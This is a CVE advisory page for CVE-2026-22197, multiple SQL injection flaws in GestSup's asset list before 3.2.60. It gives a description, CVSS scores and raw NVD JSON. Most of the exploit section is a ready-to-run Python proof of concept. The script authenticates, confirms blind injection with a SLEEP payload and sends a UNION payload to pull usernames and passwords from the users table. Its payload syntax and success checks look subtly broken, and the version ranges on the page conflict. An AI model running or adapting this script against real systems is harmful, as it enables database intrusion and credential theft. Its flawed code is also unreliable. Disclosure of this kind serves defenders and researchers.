CVE-2026-22197

Description

GestSup versions prior to 3.2.60 contain multiple SQL injection vulnerabilities in the asset list functionality. Multiple request parameters used to filter, search, or sort assets are incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:* - VULNERABLE

GestSup < 3.2.60

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-22197 PoC - GestSup SQL Injection in Asset List
Author: VulnCheck
"""

import requests
import argparse
from urllib.parse import urlencode

def exploit_sql_injection(target_url, username, password):
    """
    Exploit SQL injection in GestSup asset list functionality
    """
    session = requests.Session()
    
    # Step 1: Authentication
    login_url = f"{target_url}/index.php?page=login"
    login_data = {
        'username': username,
        'password': password
    }
    
    print("[*] Authenticating to GestSup...")
    response = session.post(login_url, data=login_data)
    
    if 'logout' not in response.text.lower():
        print("[-] Authentication failed!")
        return None
    
    print("[+] Authentication successful!")
    
    # Step 2: SQL Injection in asset list sorting parameter
    asset_url = f"{target_url}/index.php?page=assets"
    
    # Payload: Extract database version using time-based blind injection
    # This payload works on MySQL databases
    sql_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))a)---"
    
    print(f"[*] Sending SQL injection payload...")
    params = {
        'order': sql_payload,
        'sens': 'ASC'
    }
    
    import time
    start_time = time.time()
    response = session.get(asset_url, params=params, timeout=30)
    elapsed = time.time() - start_time
    
    if elapsed >= 5:
        print("[+] SQL Injection confirmed! Database is vulnerable.")
        print(f"[+] Time-based blind injection successful (delay: {elapsed:.2f}s)")
    
    # Step 3: Extract data using UNION-based injection
    # This payload attempts to extract user credentials
    union_payload = "1' UNION SELECT 1,2,username,password,5,6,7,8,9,10,11,12 FROM users---"
    
    params = {
        'order': union_payload,
        'sens': 'ASC'
    }
    
    print("[*] Extracting sensitive data...")
    response = session.get(asset_url, params=params)
    
    if 'admin' in response.text.lower() or 'password' in response.text.lower():
        print("[+] Data extraction successful!")
    
    return session.cookies

def main():
    parser = argparse.ArgumentParser(description='CVE-2026-22197 GestSup SQL Injection')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Username')
    parser.add_argument('-p', '--password', required=True, help='Password')
    
    args = parser.parse_args()
    
    exploit_sql_injection(args.target, args.username, args.password)

if __name__ == '__main__':
    main()

# Usage: python cve-2026-22197.py -t http://target-gestsup.com -u user -p password

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22197
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22197
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22197/
[4] VulDB https://vuldb.com/cve/CVE-2026-22197
[5] https://gestsup.fr/index.php?page=changelog
[6] https://www.vulncheck.com/advisories/gestsup-multiple-sqli-in-asset-list

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22197", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:55.170", "lastModified": "2026-01-14T19:43:05.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GestSup versions prior to 3.2.60 contain multiple SQL injection vulnerabilities in the asset list functionality. Multiple request parameters used to filter, search, or sort assets are incorporated into SQL queries without sufficient neutralization, allowing an authenticated attacker to manipulate database queries. Successful exploitation can result in unauthorized access to or modification of database contents depending on database privileges."}, {"lang": "es", "value": "Las versiones de GestSup anteriores a la 3.2.60 contienen múltiples vulnerabilidades de inyección SQL en la funcionalidad de lista de activos. Múltiples parámetros de solicitud utilizados para filtrar, buscar o clasificar activos se incorporan en consultas SQL sin una neutralización suficiente, lo que permite a un atacante autenticado manipular las consultas de la base de datos. La explotación exitosa puede resultar en acceso no autorizado o modificación de los contenidos de la base de datos, dependiendo de los privilegios de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gestsup:gestsup:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.56", "matchCriteriaId": "42882370-536F-4C20-B766-1729C16A0021"}]}]}], "references": [{"url": "https://gestsup.fr/index.php?page=changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/gestsup-multiple-sqli-in-asset-list", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}